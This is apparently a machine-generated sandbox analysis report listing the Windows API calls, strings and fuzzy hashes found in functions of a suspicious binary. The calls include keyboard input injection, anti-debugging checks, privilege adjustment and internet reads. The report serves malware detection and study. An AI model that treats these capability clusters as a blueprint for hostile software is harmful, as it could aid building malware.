                                                                • Opcode Fuzzy Hash: df8e9dc1cdb6a7926c90eeb52d33befd0598dd8548cd29112a85b89358718b2d
                                                                • Instruction Fuzzy Hash: F1A29F70E0061ACBDF64CF58C8907EDB7B1BB54311F2481AAEC15A7285EB789DC5CB91
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007782AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: ($tb}$|
                                                                • API String ID: 1659193697-2483859856
                                                                • Opcode ID: a70b82da92201749d57476ebe8f2d771d6945227e457d1ce147e39cf1a968d70
                                                                • Instruction ID: a241425c70ab24491b6eaa44b3166cd77de142b95661e282271aac67f5c28c39
                                                                • Opcode Fuzzy Hash: a70b82da92201749d57476ebe8f2d771d6945227e457d1ce147e39cf1a968d70
                                                                • Instruction Fuzzy Hash: B8323474A00605DFCB68CF69C084A6AB7F0FF48750B15C56EE49ADB3A1EB74E981CB41
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0079A6AC
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0079A6BA
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0079A79C
                                                                • CloseHandle.KERNEL32(00000000), ref: 0079A7AB
                                                                  • Part of subcall function 0072CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00753303,?), ref: 0072CE8A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                • String ID:
                                                                • API String ID: 1991900642-0
                                                                • Opcode ID: 82d1504f0f097ab45a52c8be3ffb20f3c1b9fbee890b56d18304c96de7d0d9fc
                                                                • Instruction ID: 6577b24413231ee6815e4e94667bde4ead71ac23d8920695cd086d0c33202d25
                                                                • Opcode Fuzzy Hash: 82d1504f0f097ab45a52c8be3ffb20f3c1b9fbee890b56d18304c96de7d0d9fc
                                                                • Instruction Fuzzy Hash: 85512C71508310EFD710EF28D88AA5BBBE8FF89754F00891DF58597291EB34E945CB92
                                                                APIs
                                                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0077AAAC
                                                                • SetKeyboardState.USER32(00000080), ref: 0077AAC8
                                                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0077AB36
                                                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0077AB88
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID:
                                                                • API String ID: 432972143-0
                                                                • Opcode ID: 32e0fa2ea806937e60ccd7e3bb6284240c35afdf3502e4d20e6411c8ac2fb7bb
                                                                • Instruction ID: f7b293f2b0219cd9f7f119fe342ad18b58da321774cfe073e7bc186f8075620e
                                                                • Opcode Fuzzy Hash: 32e0fa2ea806937e60ccd7e3bb6284240c35afdf3502e4d20e6411c8ac2fb7bb
                                                                • Instruction Fuzzy Hash: E33109B1A40248BEFF35CA64CC05BFE77A6ABC5350F04C21AF189561E1D37C9985C766
                                                                APIs
                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0078CE89
                                                                • GetLastError.KERNEL32(?,00000000), ref: 0078CEEA
                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 0078CEFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorEventFileInternetLastRead
                                                                • String ID:
                                                                • API String ID: 234945975-0
                                                                • Opcode ID: e9ead9153a08f7de0269bb3caec01bcef9ac18df9910645065bfe02d507bfe0c
                                                                • Instruction ID: 5ab7a1b3cc7ec420ee4d53d9262dfa284f086548df018b9464d9b5e09cb0678b
                                                                • Opcode Fuzzy Hash: e9ead9153a08f7de0269bb3caec01bcef9ac18df9910645065bfe02d507bfe0c
                                                                • Instruction Fuzzy Hash: 8B21CFB2540305EBEB32EF65C949BA7B7FCEB40314F10841EE646D2151EB78EE048B64
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,00755222), ref: 0077DBCE
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0077DBDD
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0077DBEE
                                                                • FindClose.KERNEL32(00000000), ref: 0077DBFA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                • String ID:
                                                                • API String ID: 2695905019-0
                                                                • Opcode ID: 7fc455223917fb0fcf06fe3d132dd4ee6b2e069a4ca13ffdbcd0756ea121652e
                                                                • Instruction ID: 0e8db9eb0887bbd4ddfbbb28e9558a1b47cc3b62dee6685332612eef450e94a1
                                                                • Opcode Fuzzy Hash: 7fc455223917fb0fcf06fe3d132dd4ee6b2e069a4ca13ffdbcd0756ea121652e
                                                                • Instruction Fuzzy Hash: 91F0EC304105146B96326B7CDC0D4AA377CAE42374F10C702F43AC10F0EBB85D54C5E9
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00785CC1
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00785D17
                                                                • FindClose.KERNEL32(?), ref: 00785D5F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 3541575487-0
                                                                • Opcode ID: ce78ccbf684e5c05e418c5a5ee7bb26b4b550b23b436658532e5322696a1d5c4
                                                                • Instruction ID: 5caa924bceda6421d0d6e14505dfd43ae1edbb1c833121143203ab90be7874f7
                                                                • Opcode Fuzzy Hash: ce78ccbf684e5c05e418c5a5ee7bb26b4b550b23b436658532e5322696a1d5c4
                                                                • Instruction Fuzzy Hash: 15519A75704A01DFC714DF28C498A96B7E4FF49314F14855EE95A8B3A2CB38EC44CBA1
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0074271A
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00742724
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00742731
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 8636de60ace649e46909e61b952a10aac7fee11139386ba5090c5d235afd6f0e
                                                                • Instruction ID: 900e284fc14a955f19388db890ddb076f9fd90f0d7a85a3fb04be8894caacda3
                                                                • Opcode Fuzzy Hash: 8636de60ace649e46909e61b952a10aac7fee11139386ba5090c5d235afd6f0e
                                                                • Instruction Fuzzy Hash: CF31D57494122CABCB21DF64DD887DCBBB8AF08310F5081EAE40CA7261E7349F818F45
                                                                APIs
                                                                • SetErrorMode.KERNEL32(00000001), ref: 007851DA
                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00785238
                                                                • SetErrorMode.KERNEL32(00000000), ref: 007852A1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                • String ID:
                                                                • API String ID: 1682464887-0
                                                                • Opcode ID: 470bd785796b26f8d892bd122243fe070f897c7f61540a6105675284aa374ae5
                                                                • Instruction ID: 90bb344ff3262e5ec305e0776f52d376dd1277b17bb60e7ed54efc3fd2a2e9d7
                                                                • Opcode Fuzzy Hash: 470bd785796b26f8d892bd122243fe070f897c7f61540a6105675284aa374ae5
                                                                • Instruction Fuzzy Hash: 10315075A00518DFDB00DF54D888EADBBF5FF49314F088099E8059B392DB35E856CB90
                                                                APIs
                                                                  • Part of subcall function 0072FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00730668
                                                                  • Part of subcall function 0072FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00730685
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077170D
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0077173A
                                                                • GetLastError.KERNEL32 ref: 0077174A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                • String ID:
                                                                • API String ID: 577356006-0
                                                                • Opcode ID: de3d253ce0d89adb7ae291b7144a6e2545366d7955df46284ca7488c850d095e
                                                                • Instruction ID: 006df684b40a2ef75372a37d626e28427f634c7938695d93609e416c9fcde467
                                                                • Opcode Fuzzy Hash: de3d253ce0d89adb7ae291b7144a6e2545366d7955df46284ca7488c850d095e
                                                                • Instruction Fuzzy Hash: 4D1191B2504304BFDB189F54EC86D6BB7BDEB44754B20C52EE05657241EB74BC418B64
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0077D608
                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0077D645
                                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0077D650
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                • String ID:
                                                                • API String ID: 33631002-0
                                                                • Opcode ID: 6c0d9351c165cef0156cadfeffa3ece59667236d4e04fc6272c4073093d1bfb3
                                                                • Instruction ID: e160c162093a01a06ebec37c6d1e6b3681c2ad03cd159bce7f979925ac246f02
                                                                • Opcode Fuzzy Hash: 6c0d9351c165cef0156cadfeffa3ece59667236d4e04fc6272c4073093d1bfb3
                                                                • Instruction Fuzzy Hash: 52115E75E05228BFDB218F95DC45FAFBBBCEB45B90F108115F908E7290D6744E058BA1
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0077168C
                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007716A1
                                                                • FreeSid.ADVAPI32(?), ref: 007716B1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                • Opcode ID: a13338226f4e1463696f20c1c32ccd2f5bca4f598ae4c6730894de406d796f45
                                                                • Instruction ID: a06a0ffde052be720ac62903b1d0535bc6a15ff69b92f30ebc399cc4fb198497
                                                                • Opcode Fuzzy Hash: a13338226f4e1463696f20c1c32ccd2f5bca4f598ae4c6730894de406d796f45
                                                                • Instruction Fuzzy Hash: 4DF0F47195030DFBDF01DFE49C89AAEBBBCEB08644F508565E601E2181E778AA448B54
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(007428E9,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002,00000000,?,007428E9), ref: 00734D09
                                                                • TerminateProcess.KERNEL32(00000000,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002,00000000,?,007428E9), ref: 00734D10
                                                                • ExitProcess.KERNEL32 ref: 00734D22
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 587f9d0bcb64feacf17a6f5caa9774471686834c6b9ba6d5a022fae6e187e72b
                                                                • Instruction ID: f71e474f37f7d0577c0548a2aaf5504297bc068c4a3bdbc9ea5456626bc873f8
                                                                • Opcode Fuzzy Hash: 587f9d0bcb64feacf17a6f5caa9774471686834c6b9ba6d5a022fae6e187e72b
                                                                • Instruction Fuzzy Hash: BFE0B631110548FBDF16AF64DD09A593B79EB82781F118014FD099A133CB3DED42CA85
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /
                                                                • API String ID: 0-2043925204
                                                                • Opcode ID: 7232e795c27606179e7a50f009a48075a7384c4ed026d0cdcde7ebd87220fce9
                                                                • Instruction ID: 737a5323a9aad5b4a6c6f8cea4f52533b2d8896c4b376665c67b0e8f2f9a41bf
                                                                • Opcode Fuzzy Hash: 7232e795c27606179e7a50f009a48075a7384c4ed026d0cdcde7ebd87220fce9
                                                                • Instruction Fuzzy Hash: D5414772901219AFCB209FB9CC89EBB77B8EB84314F1082A9F905C7180E7749D81CB50
                                                                APIs
                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0076D28C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: NameUser
                                                                • String ID: X64
                                                                • API String ID: 2645101109-893830106
                                                                • Opcode ID: 494fac3842971052d2fca4a7269eb05d02fa0dd167468eb3d23120fe1533d802
                                                                • Instruction ID: f72d0ec976e44be8fd900533816f1512d22994b5ad2ca17f3e92a5d765834ca4
                                                                • Opcode Fuzzy Hash: 494fac3842971052d2fca4a7269eb05d02fa0dd167468eb3d23120fe1533d802
                                                                • Instruction Fuzzy Hash: 34D0CAB481116DEECBA0CBA0EC88DEAB3BCBB04305F104292F506A2000DB789A488F20
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                • Instruction ID: daae3e6d4a2dbff54cf49b291f8839ea577bbfb18e533db465d9402f8d9dbaf9
                                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                • Instruction Fuzzy Hash: F2022D72E002199FEF15CFA9C8806ADFBF1EF48314F258169E919F7381D735AA418B90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Variable is not of type 'Object'.$p#~
                                                                • API String ID: 0-3866028822
                                                                • Opcode ID: eb610a1f6a6a98865deba8c89dd6acc969febcefcdb5422e9ce7d066b449d6b9
                                                                • Instruction ID: 9bb3ff8076c1c36e097326131e4496056075bcae88daab8d156064b3d33845e5
                                                                • Opcode Fuzzy Hash: eb610a1f6a6a98865deba8c89dd6acc969febcefcdb5422e9ce7d066b449d6b9
                                                                • Instruction Fuzzy Hash: 50328070940218DFCF15DF98D885AEEB7B5FF05304F148059E806AB2D2D779AD86CBA1
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00786918
                                                                • FindClose.KERNEL32(00000000), ref: 00786961
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: 824c8a2bb04a4b028012572a06a8a7410fdb07a2b3ed8054d228fd6f4bf978b6
                                                                • Instruction ID: 637e530f3fad9467de3aa12b805b9eff45e83af646291ab18d8bb8416a9b5e66
                                                                • Opcode Fuzzy Hash: 824c8a2bb04a4b028012572a06a8a7410fdb07a2b3ed8054d228fd6f4bf978b6
                                                                • Instruction Fuzzy Hash: 9E118E71604200AFD710DF69D488A16BBE5FF85328F14C69DE4698F6A2CB38EC45CB91
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00794891,?,?,00000035,?), ref: 007837E4
                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00794891,?,?,00000035,?), ref: 007837F4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorFormatLastMessage
                                                                • String ID:
                                                                • API String ID: 3479602957-0
